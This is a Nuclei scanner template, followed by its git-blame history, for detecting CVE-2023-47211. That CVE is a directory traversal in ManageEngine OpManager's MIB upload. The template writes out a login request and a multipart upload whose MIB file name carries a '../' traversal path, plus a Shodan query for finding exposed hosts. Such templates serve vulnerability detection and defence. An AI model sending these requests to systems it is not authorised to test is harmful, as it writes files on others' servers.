nuclei-templates/http/cves/2023/CVE-2023-47211.yaml

id: CVE-2023-47211

info:
  name: ManageEngine OpManager - Directory Traversal
  author: gy741
  severity: high
  description: |
    A directory traversal vulnerability exists in the uploadMib functionality of ManageEngine OpManager 12.7.258. A specially crafted HTTP request can lead to arbitrary file creation. An attacker can send a malicious MiB file to trigger this vulnerability.
  reference:
    - https://talosintelligence.com/vulnerability_reports/TALOS-2023-1851
    - https://nvd.nist.gov/vuln/detail/CVE-2023-47211
    - https://github.com/fkie-cad/nvd-json-data-feeds
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N
    cvss-score: 8.6
    cve-id: CVE-2023-47211
    cwe-id: CWE-22
    epss-score: 0.00164
    epss-percentile: 0.52059
    cpe: cpe:2.3:a:zohocorp:manageengine_firewall_analyzer:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: zohocorp
    product: manageengine_firewall_analyzer
    shodan-query: "http.title:\"OpManager Plus\""
  tags: cve,cve2023,zoho,manageengine,authenticated,traversal,lfi,intrusive

http:
  - raw:
      - |
        POST /two_factor_auth HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        j_username={{username}}&j_password={{password}}

      - |
        POST /client/api/json/mibbrowser/uploadMib HTTP/1.1
        Host: {{Hostname}}
        X-ZCSRF-TOKEN: opmcsrftoken={{x_zcsrf_token}}
        Content-Type: multipart/form-data; boundary=---------------------------372334936941313273904263503262

        -----------------------------372334936941313273904263503262
        Content-Disposition: form-data; name="mibFile"; filename="karas.txt"
        Content-Type: text/plain

        ../images/karas DEFINITIONS ::= BEGIN


        IMPORTS
            enterprises
                FROM RFC1155-SMI;

        microsoft       OBJECT IDENTIFIER ::= { enterprises 311 }
        software        OBJECT IDENTIFIER ::= { microsoft 1 }
        systems         OBJECT IDENTIFIER ::= { software 1 }
        os              OBJECT IDENTIFIER ::= { systems 3 }
        windowsNT       OBJECT IDENTIFIER ::= { os 1 }
        windows         OBJECT IDENTIFIER ::= { os 2 }
        workstation     OBJECT IDENTIFIER ::= { windowsNT 1 }
        server          OBJECT IDENTIFIER ::= { windowsNT 2 }
        dc              OBJECT IDENTIFIER ::= { windowsNT 3 }

        END

        -----------------------------372334936941313273904263503262--

      - |
        POST /client/api/json/mibbrowser/uploadMib HTTP/1.1
        Host: {{Hostname}}
        X-ZCSRF-TOKEN: opmcsrftoken={{x_zcsrf_token}}
        Content-Type: multipart/form-data; boundary=---------------------------372334936941313273904263503262

        -----------------------------372334936941313273904263503262
        Content-Disposition: form-data; name="mibFile"; filename="karas.txt"
        Content-Type: text/plain

        ../images/karas DEFINITIONS ::= BEGIN


        IMPORTS
            enterprises
                FROM RFC1155-SMI;

        microsoft       OBJECT IDENTIFIER ::= { enterprises 311 }
        software        OBJECT IDENTIFIER ::= { microsoft 1 }
        systems         OBJECT IDENTIFIER ::= { software 1 }
        os              OBJECT IDENTIFIER ::= { systems 3 }
        windowsNT       OBJECT IDENTIFIER ::= { os 1 }
        windows         OBJECT IDENTIFIER ::= { os 2 }
        workstation     OBJECT IDENTIFIER ::= { windowsNT 1 }
        server          OBJECT IDENTIFIER ::= { windowsNT 2 }
        dc              OBJECT IDENTIFIER ::= { windowsNT 3 }

        END

        -----------------------------372334936941313273904263503262--

    host-redirects: true
    max-redirects: 3
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains(body, "MIBFile with same name already exists")'
        condition: and

    extractors:
      - type: regex
        name: x_zcsrf_token
        group: 1
        part: header
        regex:
          - 'Set-Cookie: opmcsrfcookie=([^;]{50,})'
        internal: true
# digest: 490a00463044022065e6f603f0e38ded5d6d7d64b26a3c4f033fe991d1b0bd52647d1f06a8b848de02204921a44eff428087946e64109d72ce0cb050c7167e6d3b2fa2eded319790416b:922c64590222798bb761d5b6d8e72950
Create CVE-2023-47211 A directory traversal vulnerability exists in the uploadMib functionality of ManageEngine OpManager 12.7.258. A specially crafted HTTP request can lead to arbitrary file creation. An attacker can send a malicious MiB file to trigger this vulnerability. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2024-01-13 09:35:55 +00:00			`id: CVE-2023-47211`

			`info:`
lint fixes 2024-01-13 11:06:00 +00:00			`name: ManageEngine OpManager - Directory Traversal`
Create CVE-2023-47211 A directory traversal vulnerability exists in the uploadMib functionality of ManageEngine OpManager 12.7.258. A specially crafted HTTP request can lead to arbitrary file creation. An attacker can send a malicious MiB file to trigger this vulnerability. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2024-01-13 09:35:55 +00:00			`author: gy741`
			`severity: high`
			`description: \|`
			`A directory traversal vulnerability exists in the uploadMib functionality of ManageEngine OpManager 12.7.258. A specially crafted HTTP request can lead to arbitrary file creation. An attacker can send a malicious MiB file to trigger this vulnerability.`
			`reference:`
			`- https://talosintelligence.com/vulnerability_reports/TALOS-2023-1851`
Update CVE-2023-47211.yaml 2024-01-25 08:11:38 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2023-47211`
TemplateMan Update [Mon Jan 29 17:11:13 UTC 2024] :robot: 2024-01-29 17:11:14 +00:00			`- https://github.com/fkie-cad/nvd-json-data-feeds`
Create CVE-2023-47211 A directory traversal vulnerability exists in the uploadMib functionality of ManageEngine OpManager 12.7.258. A specially crafted HTTP request can lead to arbitrary file creation. An attacker can send a malicious MiB file to trigger this vulnerability. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2024-01-13 09:35:55 +00:00			`classification:`
TemplateMan Update [Mon Jan 29 17:11:13 UTC 2024] :robot: 2024-01-29 17:11:14 +00:00			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N`
Create CVE-2023-47211 A directory traversal vulnerability exists in the uploadMib functionality of ManageEngine OpManager 12.7.258. A specially crafted HTTP request can lead to arbitrary file creation. An attacker can send a malicious MiB file to trigger this vulnerability. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2024-01-13 09:35:55 +00:00			`cvss-score: 8.6`
			`cve-id: CVE-2023-47211`
			`cwe-id: CWE-22`
TemplateMan Update [Mon Jan 29 17:11:13 UTC 2024] :robot: 2024-01-29 17:11:14 +00:00			`epss-score: 0.00164`
TemplateMan Update [Sat Mar 23 09:28:19 UTC 2024] :robot: 2024-03-23 09:28:19 +00:00			`epss-percentile: 0.52059`
Create CVE-2023-47211 A directory traversal vulnerability exists in the uploadMib functionality of ManageEngine OpManager 12.7.258. A specially crafted HTTP request can lead to arbitrary file creation. An attacker can send a malicious MiB file to trigger this vulnerability. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2024-01-13 09:35:55 +00:00			`cpe: cpe:2.3:a:zohocorp:manageengine_firewall_analyzer::::::::`
			`metadata:`
TemplateMan Update [Mon Jan 29 11:58:34 UTC 2024] :robot: 2024-01-29 11:58:34 +00:00			`max-request: 3`
TemplateMan Update [Mon Jan 29 17:11:13 UTC 2024] :robot: 2024-01-29 17:11:14 +00:00			`vendor: zohocorp`
			`product: manageengine_firewall_analyzer`
TemplateMan Update [Mon Jan 29 11:58:34 UTC 2024] :robot: 2024-01-29 11:58:34 +00:00			`shodan-query: "http.title:\"OpManager Plus\""`
TemplateMan Update [Mon Jan 29 17:11:13 UTC 2024] :robot: 2024-01-29 17:11:14 +00:00			`tags: cve,cve2023,zoho,manageengine,authenticated,traversal,lfi,intrusive`
Create CVE-2023-47211 A directory traversal vulnerability exists in the uploadMib functionality of ManageEngine OpManager 12.7.258. A specially crafted HTTP request can lead to arbitrary file creation. An attacker can send a malicious MiB file to trigger this vulnerability. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2024-01-13 09:35:55 +00:00
			`http:`
			`- raw:`
			`- \|`
			`POST /two_factor_auth HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`j_username={{username}}&j_password={{password}}`
lint fixes 2024-01-13 11:06:00 +00:00
Create CVE-2023-47211 A directory traversal vulnerability exists in the uploadMib functionality of ManageEngine OpManager 12.7.258. A specially crafted HTTP request can lead to arbitrary file creation. An attacker can send a malicious MiB file to trigger this vulnerability. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2024-01-13 09:35:55 +00:00			`- \|`
			`POST /client/api/json/mibbrowser/uploadMib HTTP/1.1`
			`Host: {{Hostname}}`
			`X-ZCSRF-TOKEN: opmcsrftoken={{x_zcsrf_token}}`
			`Content-Type: multipart/form-data; boundary=---------------------------372334936941313273904263503262`

			`-----------------------------372334936941313273904263503262`
			`Content-Disposition: form-data; name="mibFile"; filename="karas.txt"`
			`Content-Type: text/plain`

			`../images/karas DEFINITIONS ::= BEGIN`


			`IMPORTS`
			`enterprises`
			`FROM RFC1155-SMI;`

			`microsoft OBJECT IDENTIFIER ::= { enterprises 311 }`
			`software OBJECT IDENTIFIER ::= { microsoft 1 }`
			`systems OBJECT IDENTIFIER ::= { software 1 }`
			`os OBJECT IDENTIFIER ::= { systems 3 }`
			`windowsNT OBJECT IDENTIFIER ::= { os 1 }`
			`windows OBJECT IDENTIFIER ::= { os 2 }`
			`workstation OBJECT IDENTIFIER ::= { windowsNT 1 }`
			`server OBJECT IDENTIFIER ::= { windowsNT 2 }`
			`dc OBJECT IDENTIFIER ::= { windowsNT 3 }`

			`END`

			`-----------------------------372334936941313273904263503262--`
lint fixes 2024-01-13 11:06:00 +00:00
Create CVE-2023-47211 A directory traversal vulnerability exists in the uploadMib functionality of ManageEngine OpManager 12.7.258. A specially crafted HTTP request can lead to arbitrary file creation. An attacker can send a malicious MiB file to trigger this vulnerability. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2024-01-13 09:35:55 +00:00			`- \|`
			`POST /client/api/json/mibbrowser/uploadMib HTTP/1.1`
			`Host: {{Hostname}}`
			`X-ZCSRF-TOKEN: opmcsrftoken={{x_zcsrf_token}}`
			`Content-Type: multipart/form-data; boundary=---------------------------372334936941313273904263503262`

			`-----------------------------372334936941313273904263503262`
			`Content-Disposition: form-data; name="mibFile"; filename="karas.txt"`
			`Content-Type: text/plain`

			`../images/karas DEFINITIONS ::= BEGIN`


			`IMPORTS`
			`enterprises`
			`FROM RFC1155-SMI;`

			`microsoft OBJECT IDENTIFIER ::= { enterprises 311 }`
			`software OBJECT IDENTIFIER ::= { microsoft 1 }`
			`systems OBJECT IDENTIFIER ::= { software 1 }`
			`os OBJECT IDENTIFIER ::= { systems 3 }`
			`windowsNT OBJECT IDENTIFIER ::= { os 1 }`
			`windows OBJECT IDENTIFIER ::= { os 2 }`
			`workstation OBJECT IDENTIFIER ::= { windowsNT 1 }`
			`server OBJECT IDENTIFIER ::= { windowsNT 2 }`
			`dc OBJECT IDENTIFIER ::= { windowsNT 3 }`

			`END`

lint fixes 2024-01-13 11:06:00 +00:00			`-----------------------------372334936941313273904263503262--`
Create CVE-2023-47211 A directory traversal vulnerability exists in the uploadMib functionality of ManageEngine OpManager 12.7.258. A specially crafted HTTP request can lead to arbitrary file creation. An attacker can send a malicious MiB file to trigger this vulnerability. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2024-01-13 09:35:55 +00:00
Update CVE-2023-47211.yaml 2024-01-25 08:11:38 +00:00			`host-redirects: true`
			`max-redirects: 3`
Create CVE-2023-47211 A directory traversal vulnerability exists in the uploadMib functionality of ManageEngine OpManager 12.7.258. A specially crafted HTTP request can lead to arbitrary file creation. An attacker can send a malicious MiB file to trigger this vulnerability. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2024-01-13 09:35:55 +00:00			`matchers:`
			`- type: dsl`
			`dsl:`
			`- 'status_code == 200'`
			`- 'contains(content_type, "application/json")'`
			`- 'contains(body, "MIBFile with same name already exists")'`
			`condition: and`

			`extractors:`
			`- type: regex`
			`name: x_zcsrf_token`
			`group: 1`
			`part: header`
			`regex:`
			`- 'Set-Cookie: opmcsrfcookie=([^;]{50,})'`
lint fixes 2024-01-13 11:06:00 +00:00			`internal: true`
Auto Template Signing [Mon Mar 25 11:57:16 UTC 2024] :robot: 2024-03-25 11:57:16 +00:00			`# digest: 490a00463044022065e6f603f0e38ded5d6d7d64b26a3c4f033fe991d1b0bd52647d1f06a8b848de02204921a44eff428087946e64109d72ce0cb050c7167e6d3b2fa2eded319790416b:922c64590222798bb761d5b6d8e72950`